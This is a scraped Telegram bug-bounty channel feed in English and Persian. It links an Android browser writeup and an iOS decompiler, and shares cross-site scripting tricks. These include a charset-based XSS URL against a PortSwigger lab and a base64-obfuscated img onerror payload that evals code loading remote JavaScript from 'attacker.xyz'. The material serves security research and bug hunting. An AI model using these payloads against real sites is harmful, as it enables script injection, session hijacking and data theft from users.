Please open Telegram to view this post
VIEW IN TELEGRAM
Writeups
Android web attack surface
The following is a writeup for some Android specific chromium behaviors.
❤3
👍2🔥2
Forwarded from Android Security & Malware
Malimite: iOS decompiler designed to analyze and decode IPA files
Built on top of Ghidra to offer direct support for Swift, Objective-C, and iOS resources
https://github.com/LaurieWired/Malimite
Built on top of Ghidra to offer direct support for Swift, Objective-C, and iOS resources
https://github.com/LaurieWired/Malimite
GitHub
GitHub - LaurieWired/Malimite: iOS and macOS Decompiler
iOS and macOS Decompiler. Contribute to LaurieWired/Malimite development by creating an account on GitHub.
❤3
BugBounty & Hacking Resources
https://x.com/garethheyes/status/1871540782328352965?s=46
این کاربردش کجاس(ff):
اگه تو هدر یا متا تگ charset تعریف ولی ست نشده باشه یا مقدارش اشتباه باشه
تو (chrome) به نظر باید حتما:
iso-2022-jp
باشه
اگه تو هدر یا متا تگ charset تعریف ولی ست نشده باشه یا مقدارش اشتباه باشه
تو (chrome) به نظر باید حتما:
iso-2022-jp
باشه
🔥6❤2👍1
BugBounty & Hacking Resources
این کاربردش کجاس(ff): اگه تو هدر یا متا تگ charset تعریف ولی ست نشده باشه یا مقدارش اشتباه باشه تو (chrome) به نظر باید حتما: iso-2022-jp باشه
برای کروم هم میشه(حتی اگرم charset نباشه یا الکی باشه):
https://portswigger-labs.net/xss/charset.php?x=%1B%1B%3Ca%20href=javas%1B(Jcript:alert(1)%3Etest%3C/a%3E&charset=
https://portswigger-labs.net/xss/charset.php?x=%1B%1B%3Ca%20href=javas%1B(Jcript:alert(1)%3Etest%3C/a%3E&charset=
BugBounty & Hacking Resources
Photo
This media is not supported in your browser
VIEW IN TELEGRAM
🤣10
BugBounty & Hacking Resources
👋
هر 1 روز در ایران == زوال عقل بیشتر
الانم که وضع vpn ها بدترم شده😩
بیشتر انرژیمون فقط سره connect بودنه
الانم که وضع vpn ها بدترم شده
بیشتر انرژیمون فقط سره connect بودنه
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
noscriptElement = document.createElement('noscript');
noscriptElement.src = 'https://attacker.xyz/path_to_file.js';
document.head.appendChild(noscriptElement);اگه خواستید js رو از سایتتون لود کنید. برای شرایطی که کد اکسپلویت گنده بود.
و اینکه میتونید همینو base64 کنید که اذیت نشید. مثلا:
<img src=1 onerror="x=atob`c2NyaXB0RWxlbWVudCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpOwpzY3JpcHRFbGVtZW50LnNyYyA9ICdodHRwczovL2F0dGFja2VyLnh5ei9wYXRoX3RvX2ZpbGUuanMnOwpkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKHNjcmlwdEVsZW1lbnQpOw`;eval(x)">
تو سورس پابلیک زیاد گفتنش, ولی خب اینجا میذارم چون کاربردیه
#xss
👍5❤1